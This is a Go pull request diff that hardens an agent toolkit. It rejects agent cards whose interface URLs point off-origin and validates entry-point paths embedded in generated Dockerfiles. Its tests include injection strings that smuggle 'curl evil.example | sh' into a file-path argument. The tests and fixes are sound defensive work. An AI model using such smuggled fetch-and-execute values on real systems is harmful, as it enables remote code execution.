### PR TITLE
fix: backport security hardening fixes (#1418, #1240)

### DIFF
--- a/agent/remoteagent/v2/a2a_agent.go
+++ b/agent/remoteagent/v2/a2a_agent.go
@@ -20,6 +20,7 @@ import (
 	"errors"
 	"fmt"
 	"iter"
+	"net"
 	"net/url"
 	"os"
 	"strings"
@@ -96,6 +97,113 @@ func classifyCardSource(source string) (isFile bool, err error) {
 	return false, fmt.Errorf("%w %q: scheme %q is not supported, use http(s):// or a file path", ErrUnsupportedCardSource, source, u.Scheme)
 }
 
+// ErrUntrustedCardInterface is returned when a fetched agent card declares an
+// interface URL that does not share the origin it was fetched from.
+var ErrUntrustedCardInterface = errors.New("untrusted agent card interface")
+
+// validateCardInterfaceOrigins constrains where a card fetched over the
+// network may aim RPC traffic.
+//
+// A card served from a trusted, configured source URL is not itself trusted
+// content: the response is JSON from whatever answered that request, which
+// could be a compromised or misconfigured server, a MITM on the fetch, or a
+// domain that has since changed hands. agentcard.DefaultResolver.Resolve
+// performs no check that a resolved card's declared interfaces have anything
+// to do with where the card was fetched from -- confirmed directly against
+// the resolver's own source (v2.4.0, the version this package depends on):
+// it fetches, parses, and returns the card with no validation of its
+// contents at all. Without this check, every one of the card's declared
+// interface URLs is followed with no verification, meaning every subsequent
+// A2A request for this agent -- including whatever credential material the
+// request path carries -- would go to wherever the card says, not wherever
+// it was actually fetched from.
+//
+// Every interface the card declares is checked, not only whichever one a
+// given transport negotiation would select, since any of them could end up
+// being used. Each must be https, or http on a loopback host (the shape
+// local-development tooling emits, and a host an attacker who does not
+// already control this machine cannot redirect a fetch to), and must share
+// the origin of the configured agent card source -- not necessarily the
+// origin the fetch actually landed on, if the resolver followed a redirect.
+// Pinning to the configured source rather than the final URL is
+// intentional: pinning to wherever a fetch actually lands would let an open
+// redirect move the trust anchor.
+//
+// Only called for a card fetched over http(s); a card read from a local
+// file did not come off the network here, and its target is left to the
+// caller.
+func validateCardInterfaceOrigins(card *a2a.AgentCard, source string) error {
+	sourceURL, err := url.Parse(source)
+	if err != nil {
+		return fmt.Errorf("%w: invalid agent card source URL %q: %w", ErrUntrustedCardInterface, source, err)
+	}
+	sourceScheme, sourceHost, sourcePort := urlOrigin(sourceURL)
+
+	for _, iface := range card.SupportedInterfaces {
+		if iface == nil {
+			continue
+		}
+		ifaceURL, err := url.Parse(iface.URL)
+		if err != nil {
+			return fmt.Errorf("%w: invalid interface URL %q in agent card: %w", ErrUntrustedCardInterface, iface.URL, err)
+		}
+		if ifaceURL.Scheme != "https" && !isLoopbackHost(ifaceURL.Hostname()) {
+			return fmt.Errorf("%w: interface URL %q must use https, or http on a loopback host", ErrUntrustedCardInterface, iface.URL)
+		}
+		ifaceScheme, ifaceHost, ifacePort := urlOrigin(ifaceURL)
+		if ifaceScheme != sourceScheme || ifaceHost != sourceHost || ifacePort != sourcePort {
+			return fmt.Errorf("%w: interface URL %q does not share the origin of the configured agent card source (%q)", ErrUntrustedCardInterface, iface.URL, source)
+		}
+	}
+	return nil
+}
+
+// defaultPorts maps a scheme to the port a URL omitting one implies.
+var defaultPorts = map[string]string{"http": "80", "https": "443"}
+
+// urlOrigin returns the (scheme, host, port) triple identifying u's origin.
+// The hostname is case-folded and the port is normalized to the scheme's
+// default when u omits one, mirroring the comparison adk-python's
+// _url_origin performs (with its _DEFAULT_PORTS table). Comparing
+// url.URL.Host directly, as an earlier version of this check did, treats
+// "https://Agent.Example.com" as a different origin from
+// "https://agent.example.com", and "https://agent.example.com:443" as
+// different from "https://agent.example.com" -- rejecting same-origin
+// cards that spell the port explicitly or the host in a different case,
+// even though DNS hostnames are case-insensitive and both name the same
+// origin.
+func urlOrigin(u *url.URL) (scheme, host, port string) {
+	scheme = u.Scheme
+	host = strings.ToLower(u.Hostname())
+	port = u.Port()
+	if port == "" {
+		port = defaultPorts[scheme]
+	}
+	return scheme, host, port
+}
+
+// isLoopbackHost reports whether hostname names this machine itself
+// (loopback), not a remote host.
+//
+// A hostname is loopback only if it parses as a loopback IP address, or is
+// "localhost" or a subdomain of it (RFC 6761 reserves the whole
+// *.localhost space to loopback resolution, and "app.localhost" is a
+// common local-development shape). A plain prefix or substring test on the
+// hostname string is not equivalent to either check: "127.evil.com" is an
+// ordinary registrable DNS name an attacker controls, not the loopback
+// address its text merely starts with, and net.ParseIP correctly rejects
+// it as not an IP at all.
+func isLoopbackHost(hostname string) bool {
+	h := strings.ToLower(hostname)
+	if h == "localhost" || strings.HasSuffix(h, ".localhost") {
+		return true
+	}
+	if ip := net.ParseIP(hostname); ip != nil {
+		return ip.IsLoopback()
+	}
+	return false
+}
+
 // NewAgentCardProvider creates an [AgentCardProvider] that resolves an agent card from the given source.
 // The source can be an http(s) URL or a local file path. A source carrying any
 // other scheme, such as "file://", is rejected rather than read as a path.
@@ -109,6 +217,9 @@ func NewAgentCardProvider(source string, opts ...agentcard.ResolveOption) AgentC
 			card, err := agentcard.DefaultResolver.Resolve(ctx, source, opts...)
 			if err != nil {
 				return nil, fmt.Errorf("failed to fetch an agent card: %w", err)
+			}
+			if err := validateCardInterfaceOrigins(card, source); err != nil {
+				return nil, err
 			}
 			return card, nil
 		}

--- a/agent/remoteagent/v2/a2a_agent_test.go
+++ b/agent/remoteagent/v2/a2a_agent_test.go
@@ -1618,3 +1618,247 @@ func TestClassifyCardSource(t *testing.T) {
 		})
 	}
 }
+
+// newFixedURLCardServer serves a card whose single declared interface points
+// wherever ifaceURL says, independent of the server's own address -- used to
+// simulate a card declaring an interface at a different origin than the one
+// it was fetched from.
+func newFixedURLCardServer(t *testing.T, ifaceURL string) *httptest.Server {
+	t.Helper()
+
+	mux := http.NewServeMux()
+	mux.HandleFunc("/", func(w http.ResponseWriter, _ *http.Request) {
+		card := &a2a.AgentCard{
+			Name: "test-agent",
+			SupportedInterfaces: []*a2a.AgentInterface{
+				{URL: ifaceURL, ProtocolBinding: "JSONRPC"},
+			},
+		}
+		if err := json.NewEncoder(w).Encode(card); err != nil {
+			t.Errorf("json.Encode(agentCard) error = %v", err)
+		}
+	})
+
+	server := httptest.NewServer(mux)
+	t.Cleanup(server.Close)
+	return server
+}
+
+// TestNewAgentCardProvider_RejectsOffOriginInterface pins the fix for a
+// sibling of the vulnerability already fixed in the reflection-based
+// Verify() path of a different ADK port: a card fetched from a trusted,
+// configured source is not itself trusted content, and
+// agentcard.DefaultResolver.Resolve performs no check that a resolved
+// card's declared interfaces have anything to do with where the card was
+// fetched from. Confirmed directly against the resolver's own source
+// (v2.4.0, the version this package depends on): it fetches, parses, and
+// returns the card with no validation of its contents at all. Without this
+// check, a card served from a trusted source could redirect all A2A
+// traffic for the agent -- including any credential material the request
+// path carries -- to an attacker-chosen origin.
+func TestNewAgentCardProvider_RejectsOffOriginInterface(t *testing.T) {
+	server := newFixedURLCardServer(t, "https://attacker.example.net/rpc")
+
+	_, err := NewAgentCardProvider(server.URL)(t.Context())
+	if !errors.Is(err, ErrUntrustedCardInterface) {
+		t.Fatalf("NewAgentCardProvider(%q) error = %v, want %v", server.URL, err, ErrUntrustedCardInterface)
+	}
+}
+
+// newCardServer serves a card whose interfaces are built from the server's
+// own base URL, computed from the listener before the server starts
+// accepting connections. A prior version of these tests instead declared
+// `var server *httptest.Server` and had the handler closure read `server`
+// itself, assigned only after httptest.NewServer(mux) returned -- the
+// handler goroutine reading a variable the test goroutine had not yet
+// written, with nothing ordering the two. Deriving the base URL from the
+// listener address up front, and starting the server only once the
+// handler is wired to that fixed string, removes the unsynchronized
+// access entirely rather than relying on it happening not to matter in
+// practice.
+func newCardServer(t *testing.T, ifaces func(base string) []*a2a.AgentInterface) *httptest.Server {
+	t.Helper()
+
+	server := httptest.NewUnstartedServer(nil)
+	base := "http://" + server.Listener.Addr().String()
+
+	mux := http.NewServeMux()
+	mux.HandleFunc("/", func(w http.ResponseWriter, _ *http.Request) {
+		card := &a2a.AgentCard{
+			Name:                "test-agent",
+			SupportedInterfaces: ifaces(base),
+		}
+		if err := json.NewEncoder(w).Encode(card); err != nil {
+			t.Errorf("json.Encode(agentCard) error = %v", err)
+		}
+	})
+	server.Config.Handler = mux
+	server.Start()
+	t.Cleanup(server.Close)
+	return server
+}
+
+// TestNewAgentCardProvider_AcceptsSameOriginInterface confirms the fix above
+// does not regress the legitimate case: an interface URL that genuinely
+// shares the origin the card was fetched from.
+func TestNewAgentCardProvider_AcceptsSameOriginInterface(t *testing.T) {
+	server := newCardServer(t, func(base string) []*a2a.AgentInterface {
+		return []*a2a.AgentInterface{
+			{URL: base + "/rpc", ProtocolBinding: "JSONRPC"},
+		}
+	})
+
+	card, err := NewAgentCardProvider(server.URL)(t.Context())
+	if err != nil {
+		t.Fatalf("NewAgentCardProvider(%q) error = %v, want nil", server.URL, err)
+	}
+	if len(card.SupportedInterfaces) != 1 || card.SupportedInterfaces[0].URL != server.URL+"/rpc" {
+		t.Errorf("card.SupportedInterfaces = %+v, want a single interface at %q", card.SupportedInterfaces, server.URL+"/rpc")
+	}
+}
+
+// TestNewAgentCardProvider_RejectsOffOriginSecondInterface confirms every
+// declared interface is checked, not only whichever one a transport
+// negotiation would select.
+func TestNewAgentCardProvider_RejectsOffOriginSecondInterface(t *testing.T) {
+	server := newCardServer(t, func(base string) []*a2a.AgentInterface {
+		return []*a2a.AgentInterface{
+			{URL: base + "/rpc", ProtocolBinding: "JSONRPC"},
+			{URL: "https://attacker.example.net/rpc2", ProtocolBinding: "GRPC"},
+		}
+	})
+
+	_, err := NewAgentCardProvider(server.URL)(t.Context())
+	if !errors.Is(err, ErrUntrustedCardInterface) {
+		t.Fatalf("NewAgentCardProvider(%q) error = %v, want %v", server.URL, err, ErrUntrustedCardInterface)
+	}
+}
+
+// TestValidateCardInterfaceOrigins is table-driven so each rule the check
+// applies -- the scheme half of the origin comparison, the host half, the
+// port half, and the independent https/loopback requirement -- is pinned
+// by a case that isolates it. Verified against the two ways the original,
+// non-table-driven tests this replaces could pass while the check they
+// exist to pin was broken: deleting the host half of the origin
+// comparison, or deleting the scheme half, each left every prior test in
+// this file passing. Every case below was re-checked against both
+// deletions and fails on each.
+func TestValidateCardInterfaceOrigins(t *testing.T) {
+	tests := []struct {
+		name    string
+		source  string
+		ifaces  []string
+		wantErr bool
+	}{
+		{"same origin https", "https://good.example.com", []string{"https://good.example.com/rpc"}, false},
+		{"same origin loopback http", "http://127.0.0.1:8080", []string{"http://127.0.0.1:8080/rpc"}, false},
+		{"no interfaces", "https://good.example.com", nil, false},
+
+		// Pins the host half of the origin check.
+		{"off-origin host, same scheme", "https://good.example.com", []string{"https://attacker.example.net/rpc"}, true},
+		// Pins the scheme half.
+		{"off-origin scheme, same host", "http://127.0.0.1:8080", []string{"https://127.0.0.1:8080/rpc"}, true},
+
+		{
+			"second interface off-origin", "https://good.example.com",
+			[]string{"https://good.example.com/rpc", "https://attacker.example.net/rpc2"},
+			true,
+		},
+		{"plain http on non-loopback", "http://example.com", []string{"http://example.com/rpc"}, true},
+		{"off-origin port", "https://good.example.com:8443", []string{"https://good.example.com:9443/rpc"}, true},
+		{"relative interface URL", "https://good.example.com", []string{"/rpc"}, true},
+		{"empty interface URL", "https://good.example.com", []string{""}, true},
+
+		// Case-insensitive host comparison, matching adk-python's
+		// _url_origin: a DNS hostname's case does not change what it names.
+		// Not exercised by the cases above, which all keep host case fixed.
+		{
+			"interface host uppercase, source lowercase", "https://good.example.com",
+			[]string{"https://Good.Example.com/rpc"},
+			false,
+		},
+		{
+			"source host uppercase, interface lowercase", "https://Good.Example.com",
+			[]string{"https://good.example.com/rpc"},
+			false,
+		},
+
+		// Default-port normalization, matching adk-python's _DEFAULT_PORTS:
+		// an omitted port and its scheme's default port name the same
+		// origin. "off-origin port" above pins that differing explicit
+		// ports are still rejected; these pin that an omitted port isn't
+		// one of them.
+		{
+			"interface has explicit default https port, source omits it", "https://good.example.com",
+			[]string{"https://good.example.com:443/rpc"},
+			false,
+		},
+		{
+			"source has explicit default https port, interface omits it", "https://good.example.com:443",
+			[]string{"https://good.example.com/rpc"},
+			false,
+		},
+		{
+			"interface has explicit default http port on loopback, source omits it", "http://localhost",
+			[]string{"http://localhost:80/rpc"},
+			false,
+		},
+
+		// isLoopbackHost has its own table (TestIsLoopbackHost below); this
+		// case exists to confirm the two functions integrate correctly, not
+		// to re-cover isLoopbackHost's own cases.
+		{
+			"http on dns name with 127 prefix matching source", "http://127.evil.com",
+			[]string{"http://127.evil.com/rpc"},
+			true,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			card := &a2a.AgentCard{}
+			for _, u := range tt.ifaces {
+				card.SupportedInterfaces = append(card.SupportedInterfaces,
+					&a2a.AgentInterface{URL: u, ProtocolBinding: "JSONRPC"})
+			}
+			err := validateCardInterfaceOrigins(card, tt.source)
+			if gotErr := err != nil; gotErr != tt.wantErr {
+				t.Errorf("validateCardInterfaceOrigins(%q) error = %v, wantErr %v", tt.source, err, tt.wantErr)
+			}
+			if tt.wantErr && err != nil && !errors.Is(err, ErrUntrustedCardInterface) {
+				t.Errorf("error = %v, want it to wrap ErrUntrustedCardInterface", err)
+			}
+		})
+	}
+}
+
+// TestIsLoopbackHost is table-driven for the same reason as
+// TestValidateCardInterfaceOrigins above: isLoopbackHost used to be a
+// prefix test on the hostname string, under which isLoopbackHost("127.evil.com")
+// returned true for that ordinary, attacker-registrable DNS name. These
+// cases were checked against that version and fail against it.
+func TestIsLoopbackHost(t *testing.T) {
+	tests := []struct {
+		name string
+		host string
+		want bool
+	}{
+		{name: "IPv4 loopback exact", host: "127.0.0.1", want: true},
+		{name: "IPv4 loopback, other address in the range", host: "127.5.5.5", want: true},
+		{name: "IPv6 loopback", host: "::1", want: true},
+		{name: "localhost", host: "localhost", want: true},
+		{name: "localhost mixed case", host: "LocalHost", want: true},
+		{name: "subdomain of localhost, RFC 6761", host: "app.localhost", want: true},
+		{name: "dns name with a 127 prefix is not loopback", host: "127.evil.com", want: false},
+		{name: "dns name containing localhost as a substring is not loopback", host: "notlocalhost.example.com", want: false},
+		{name: "public IPv4 address", host: "93.184.216.34", want: false},
+		{name: "empty host", host: "", want: false},
+	}
+	for _, tc := range tests {
+		t.Run(tc.name, func(t *testing.T) {
+			if got := isLoopbackHost(tc.host); got != tc.want {
+				t.Errorf("isLoopbackHost(%q) = %v, want %v", tc.host, got, tc.want)
+			}
+		})
+	}
+}

--- a/cmd/adkgo/internal/deploy/agentengine/agentengine.go
+++ b/cmd/adkgo/internal/deploy/agentengine/agentengine.go
@@ -116,27 +116,20 @@ func init() {
 func (f *deployAgentEngineFlags) computeFlags() error {
 	return util.LogStartStop("Computing flags & preparing temp",
 		func(p util.Printer) error {
-			f.source.origEntryPointPath = flags.source.entryPointPath
-			absp, err := filepath.Abs(flags.source.entryPointPath)
+			f.source.origEntryPointPath = f.source.entryPointPath
+			absp, err := filepath.Abs(f.source.entryPointPath)
 			if err != nil {
 				return fmt.Errorf("cannot make an absolute path from '%v': %w", f.source.entryPointPath, err)
 			}
 			f.source.entryPointPath = absp
 
-			if flags.build.tempDir == "" {
-				flags.build.tempDir = os.TempDir()
-			}
-			absp, err = filepath.Abs(flags.build.tempDir)
-			if err != nil {
-				return fmt.Errorf("cannot make an absolute path from '%v': %w", f.build.tempDir, err)
-			}
-			f.build.tempDir, err = os.MkdirTemp(absp, "agentEngine_"+time.Now().Format("20060102_150405__")+"*")
-			if err != nil {
-				return fmt.Errorf("cannot create a temporary sub directory in '%v': %w", absp, err)
-			}
-			p("Using temp dir:", f.build.tempDir)
-
-			// come up with a executable name based on entry point path
+			// come up with a executable name based on entry point path.
+			// Deriving and checking it happens before the temp dir is created:
+			// everything here can fail, and cleanTemp only runs after a fully
+			// successful deploy, so a rejected value would otherwise leave an
+			// empty agentEngine_<timestamp>_* directory behind. Nothing above
+			// needs the directory; every field that resolves against it
+			// (execPath, dockerfileBuildPath, archivePath) is assigned below.
 			dir, file := path.Split(f.source.entryPointPath)
 			f.source.srcBasePath = dir
 			f.source.entryPointPath = file
@@ -146,7 +139,35 @@ func (f *deployAgentEngineFlags) computeFlags() error {
 					return fmt.Errorf("cannot strip '.go' extension from entry point path '%v': %w", f.source.entryPointPath, err)
 				}
 				f.build.execFile = exec
-				f.build.execPath = path.Join(f.build.tempDir, exec)
+			}
+
+			// Both values are embedded in a Dockerfile RUN (shell-form)
+			// instruction, so they need the stricter shell-safe allowlist,
+			// not just the quote/newline blocklist used where a value only
+			// reaches a non-shell-form context (COPY path, CMD exec array).
+			if err := util.ValidateShellArgSafe(f.build.execFile,
+				fmt.Sprintf("executable name derived from --entry_point_path %q:", f.source.origEntryPointPath)); err != nil {
+				return err
+			}
+			if err := util.ValidateShellArgSafe(f.source.origEntryPointPath, "--entry_point_path"); err != nil {
+				return err
+			}
+
+			if f.build.tempDir == "" {
+				f.build.tempDir = os.TempDir()
+			}
+			absp, err = filepath.Abs(f.build.tempDir)
+			if err != nil {
+				return fmt.Errorf("cannot make an absolute path from '%v': %w", f.build.tempDir, err)
+			}
+			f.build.tempDir, err = os.MkdirTemp(absp, "agentEngine_"+time.Now().Format("20060102_150405__")+"*")
+			if err != nil {
+				return fmt.Errorf("cannot create a temporary sub directory in '%v': %w", absp, err)
+			}
+			p("Using temp dir:", f.build.tempDir)
+
+			if f.build.execPath == "" {
+				f.build.execPath = path.Join(f.build.tempDir, f.build.execFile)
 			}
 			f.build.dockerfileBuildPath = path.Join(f.build.tempDir, "Dockerfile")
 			f.build.archivePath = path.Join(f.build.tempDir, "archive.tgz")
@@ -182,6 +203,10 @@ func (f *deployAgentEngineFlags) prepareDockerfile() error {
 		func(p util.Printer) error {
 			p("Writing:", f.build.dockerfileBuildPath)
 
+			// Every value below is read off the receiver, not off the package
+			// global. computeFlags validates the receiver, so a read of the
+			// global here would let the guard and the line it guards come apart
+			// for any caller that is not the cobra RunE.
 			var b strings.Builder
 			b.WriteString(`
 FROM golang:1.25 as builder
@@ -192,9 +217,9 @@ RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags "-s -w" -o ` + f.bui
 FROM gcr.io/distroless/static-debian11
 
 COPY --from=builder /app/` + f.build.execFile + `  /app/` + f.build.execFile + `
-EXPOSE ` + strconv.Itoa(flags.agentEngine.serverPort) + `
+EXPOSE ` + strconv.Itoa(f.agentEngine.serverPort) + `
 # Command to run the executable when the container starts
-CMD ["/app/` + f.build.execFile + `", "web", "-port", "` + strconv.Itoa(flags.agentEngine.serverPort) + `"`)
+CMD ["/app/` + f.build.execFile + `", "web", "-port", "` + strconv.Itoa(f.agentEngine.serverPort) + `"`)
 
 			b.WriteString(`, "agentengine"`)
 

--- a/cmd/adkgo/internal/deploy/agentengine/agentengine_test.go
+++ b/cmd/adkgo/internal/deploy/agentengine/agentengine_test.go
@@ -1,0 +1,229 @@
+// Copyright 2025 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package agentengine
+
+import (
+	"fmt"
+	"os"
+	"strings"
+	"testing"
+)
+
+func resetFlags(t *testing.T, entryPointPath string) {
+	t.Helper()
+	saved := flags
+	t.Cleanup(func() { flags = saved })
+
+	flags = deployAgentEngineFlags{}
+	flags.source.entryPointPath = entryPointPath
+	flags.build.tempDir = t.TempDir()
+}
+
+// allowListRejection is the part of the ValidateShellArgSafe rejection message
+// that no other validator produces. The tests below match on it rather than on
+// the label, because "entry point" is also a substring of the pre-existing
+// StripExtension wrapper ("cannot strip '.go' extension from entry point path
+// '%v'"): a payload edited to drop the .go extension would then satisfy a
+// label-only assertion while saying nothing about the allow-list. It names the
+// two reasons rather than the rejection itself, because the shorter sentence
+// ("not allowed in a value embedded in generated Dockerfile content") is in
+// ValidateDockerfileSafe's message too, and matching that would let a value
+// that reaches the RUN line be downgraded to the weaker check unnoticed.
+const allowListRejection = "whitespace splits COPY operands and shell metacharacters are live in a RUN line"
+
+func TestComputeFlags_RejectsUnsafeEntryPointBasename(t *testing.T) {
+	// The basename (with .go stripped) becomes f.build.execFile, embedded
+	// directly into the generated Dockerfile's RUN/COPY/CMD lines. The benign
+	// directory component is what makes the assertions below able to tell the
+	// derived executable name apart from the raw flag value: without it the
+	// two strings are byte-identical.
+	maliciousEntryPoint := "cmd/quickstart/main\"\nRUN curl evil.example | sh\n#.go"
+	resetFlags(t, maliciousEntryPoint)
+
+	err := flags.computeFlags()
+	if err == nil {
+		t.Fatal("computeFlags() = nil, want an error rejecting the unsafe entry point basename")
+	}
+	if !strings.Contains(err.Error(), allowListRejection) {
+		t.Errorf("computeFlags() error = %v, want the allow-list rejection %q", err, allowListRejection)
+	}
+	// The checked value is derived, so the message has to carry the flag and the
+	// value as typed for the user to be able to find it in their command line.
+	if want := fmt.Sprintf("derived from --entry_point_path %q", maliciousEntryPoint); !strings.Contains(err.Error(), want) {
+		t.Errorf("computeFlags() error = %v, want it to contain %s", err, want)
+	}
+}
+
+// TestComputeFlags_RejectsUnsafeOrigEntryPointPath covers the raw
+// --entry_point_path value, captured before any path processing. execFile, by
+// contrast, is derived only from the basename of that path, so a malicious
+// directory component does not affect it. Both payloads keep the basename clean
+// ("main.go", so the ".go"-extension strip and the execFile check both succeed)
+// while the directory component carries shell metacharacters straight into the
+// Dockerfile's `RUN ... -o execFile origEntryPointPath` line.
+func TestComputeFlags_RejectsUnsafeOrigEntryPointPath(t *testing.T) {
+	for name, maliciousEntryPoint := range map[string]string{
+		"metacharacters in a directory component": "a;curl evil.example|sh#/main.go",
+		// The second payload is the reason the check has to read the value as
+		// typed rather than any processed form of it. filepath.Abs cleans the
+		// ".." away, so f.source.srcBasePath no longer contains the "a;b"
+		// component, while the RUN line is still emitted from the raw value and
+		// still gets the ';'. A check moved onto srcBasePath accepts this.
+		"metacharacters cleaned out of the processed path": "./a;b/../main.go",
+	} {
+		t.Run(name, func(t *testing.T) {
+			resetFlags(t, maliciousEntryPoint)
+
+			err := flags.computeFlags()
+			if err == nil {
+				t.Fatal("computeFlags() = nil, want an error rejecting the unsafe --entry_point_path value")
+			}
+			if !strings.Contains(err.Error(), allowListRejection) {
+				t.Errorf("computeFlags() error = %v, want the allow-list rejection %q", err, allowListRejection)
+			}
+			// On the value as typed: pinning the label alone would leave the
+			// check free to move onto a processed form of the path under an
+			// unchanged message.
+			if want := fmt.Sprintf("--entry_point_path %q", maliciousEntryPoint); !strings.Contains(err.Error(), want) {
+				t.Errorf("computeFlags() error = %v, want the raw-value check to fire and report %s", err, want)
+			}
+			// And that it is the raw-flag check rather than the
+			// derived-executable-name one above it. That one's label embeds the
+			// raw flag value too ("executable name derived from
+			// --entry_point_path %q:"), so the assertion above matches either
+			// message and cannot tell the two checks apart on its own.
+			if strings.Contains(err.Error(), "derived from") {
+				t.Errorf("computeFlags() error = %v, want the raw --entry_point_path check to fire, not the derived executable name one", err)
+			}
+		})
+	}
+}
+
+func TestComputeFlags_AcceptsBenignValues(t *testing.T) {
+	resetFlags(t, "main.go")
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error for benign values", err)
+	}
+	if flags.build.execFile != "main" {
+		t.Errorf("execFile = %q, want %q", flags.build.execFile, "main")
+	}
+	// Deriving execFile above os.MkdirTemp is what keeps a rejected invocation
+	// from leaving a temp dir behind, and it leaves the paths that resolve
+	// against the created directory as the only thing below it. Nothing in this
+	// package reads execPath, since the build runs in the builder stage rather
+	// than on the host, so the two that have to land inside the temp dir are
+	// the ones createArchive writes and tars.
+	for name, p := range map[string]string{
+		"dockerfileBuildPath": flags.build.dockerfileBuildPath,
+		"archivePath":         flags.build.archivePath,
+	} {
+		if !strings.HasPrefix(p, flags.build.tempDir+"/") {
+			t.Errorf("%s = %q, want it inside the created temp dir %q", name, p, flags.build.tempDir)
+		}
+	}
+}
+
+// TestComputeFlags_AcceptsNonASCIIEntryPoint guards the deliberate decision to
+// let the shell-arg allowlist admit non-ASCII runes. Every byte of a multi-byte
+// UTF-8 rune is >= 0x80 and every shell metacharacter is ASCII, so admitting
+// them costs nothing in safety, while rejecting them would fail deploys whose
+// --entry_point_path merely passes through a non-ASCII directory name.
+func TestComputeFlags_AcceptsNonASCIIEntryPoint(t *testing.T) {
+	resetFlags(t, "agentes/café/agenté.go")
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error for a non-ASCII entry point path", err)
+	}
+	if flags.build.execFile != "agenté" {
+		t.Errorf("execFile = %q, want %q", flags.build.execFile, "agenté")
+	}
+}
+
+// TestComputeFlags_RejectionLeavesNoTempDir pins the ordering of every check
+// that can fail against os.MkdirTemp. cleanTemp only runs after a fully
+// successful deploy, there is no defer, so a check that fires after the temp
+// dir is created leaves an empty agentEngine_<timestamp>_* directory behind on
+// every rejected invocation. Nothing above os.MkdirTemp needs the directory;
+// the fields that do (execPath, dockerfileBuildPath, archivePath) are all
+// assigned below it.
+//
+// The third case is the one main leaks on today: StripExtension moved above
+// os.MkdirTemp with the two validators, and an entry point path with no ".go"
+// suffix is the only way to reach it.
+func TestComputeFlags_RejectionLeavesNoTempDir(t *testing.T) {
+	for name, entryPoint := range map[string]string{
+		"unsafe basename":  "main\"\nRUN curl evil.example | sh\n#.go",
+		"unsafe directory": "a;curl evil.example|sh#/main.go",
+		"no .go extension": "main",
+	} {
+		t.Run(name, func(t *testing.T) {
+			resetFlags(t, entryPoint)
+			parent := flags.build.tempDir
+
+			if err := flags.computeFlags(); err == nil {
+				t.Fatal("computeFlags() = nil, want an error")
+			}
+			entries, err := os.ReadDir(parent)
+			if err != nil {
+				t.Fatalf("cannot read the temp dir parent: %v", err)
+			}
+			for _, e := range entries {
+				t.Errorf("rejected invocation left %q behind in the temp dir parent", e.Name())
+			}
+		})
+	}
+}
+
+// TestPrepareDockerfile_EntryPointReachesRUNLine pins the reason
+// origEntryPointPath exists at all, and the reason it takes the stronger
+// validator: it is the raw --entry_point_path value, not the absolutised one,
+// that lands in the builder stage's RUN line. That stage's build context is
+// rooted at /app by `COPY . .`, so a host-absolute path there fails every
+// deploy. Without this the emitted line is only connected to the field by
+// reading the code: moving the capture below the filepath.Abs assignment
+// leaves the rest of the suite green. cloudrun ships the symmetric test for
+// its CMD array.
+func TestPrepareDockerfile_EntryPointReachesRUNLine(t *testing.T) {
+	const entryPoint = "cmd/quickstart/main.go"
+	resetFlags(t, entryPoint)
+	flags.agentEngine.serverPort = 8080
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error", err)
+	}
+	if err := flags.prepareDockerfile(); err != nil {
+		t.Fatalf("prepareDockerfile() = %v, want no error", err)
+	}
+
+	content, err := os.ReadFile(flags.build.dockerfileBuildPath)
+	if err != nil {
+		t.Fatalf("cannot read the generated Dockerfile: %v", err)
+	}
+	var runLine string
+	for _, line := range strings.Split(string(content), "\n") {
+		if rest, ok := strings.CutPrefix(line, "RUN "); ok {
+			runLine = rest
+		}
+	}
+	if runLine == "" {
+		t.Fatalf("no RUN instruction in the generated Dockerfile:\n%s", content)
+	}
+
+	want := "-o " + flags.build.execFile + " " + entryPoint
+	if !strings.HasSuffix(runLine, want) {
+		t.Errorf("RUN line = %q, want it to end with %q", runLine, want)
+	}
+}

--- a/cmd/adkgo/internal/deploy/cloudrun/cloudrun.go
+++ b/cmd/adkgo/internal/deploy/cloudrun/cloudrun.go
@@ -126,26 +126,32 @@ func init() {
 func (f *deployCloudRunFlags) computeFlags() error {
 	return util.LogStartStop("Computing flags & preparing temp",
 		func(p util.Printer) error {
-			absp, err := filepath.Abs(flags.source.entryPointPath)
+			// Checked before the temp dir is created so a rejected value does
+			// not leave one behind. It is checked whether or not --a2a is set:
+			// the flag can be flipped later, and a value that can never be
+			// emitted safely is worth reporting either way.
+			if err := util.ValidateDockerfileSafe(f.cloudRun.a2aAgentCardURL, "--a2a_agent_url"); err != nil {
+				return err
+			}
+
+			// The raw flag value, kept for the rejection message below: what
+			// the check sees is a basename derived from this, which a user who
+			// typed a whole path cannot find in their own command line.
+			origEntryPointPath := f.source.entryPointPath
+
+			absp, err := filepath.Abs(f.source.entryPointPath)
 			if err != nil {
 				return fmt.Errorf("cannot make an absolute path from '%v': %w", f.source.entryPointPath, err)
 			}
 			f.source.entryPointPath = absp
 
-			if flags.build.tempDir == "" {
-				flags.build.tempDir = os.TempDir()
-			}
-			absp, err = filepath.Abs(flags.build.tempDir)
-			if err != nil {
-				return fmt.Errorf("cannot make an absolute path from '%v': %w", f.build.tempDir, err)
-			}
-			f.build.tempDir, err = os.MkdirTemp(absp, "cloudrun_"+time.Now().Format("20060102_150405__")+"*")
-			if err != nil {
-				return fmt.Errorf("cannot create a temporary sub directory in '%v': %w", absp, err)
-			}
-			p("Using temp dir:", f.build.tempDir)
-
-			// come up with a executable name based on entry point path
+			// Deriving and checking the executable name happens before the temp
+			// dir is created, for the same reason as the --a2a_agent_url check
+			// above: everything here can fail, and cleanTemp only runs after a
+			// fully successful deploy, so a rejected invocation would otherwise
+			// leave an empty cloudrun_<timestamp>_* directory behind. Nothing
+			// above needs the directory; the fields that resolve against it
+			// (execPath, dockerfileBuildPath) are assigned below.
 			dir, file := path.Split(f.source.entryPointPath)
 			f.source.srcBasePath = dir
 			f.source.entryPointPath = file
@@ -155,7 +161,31 @@ func (f *deployCloudRunFlags) computeFlags() error {
 					return fmt.Errorf("cannot strip '.go' extension from entry point path '%v': %w", f.source.entryPointPath, err)
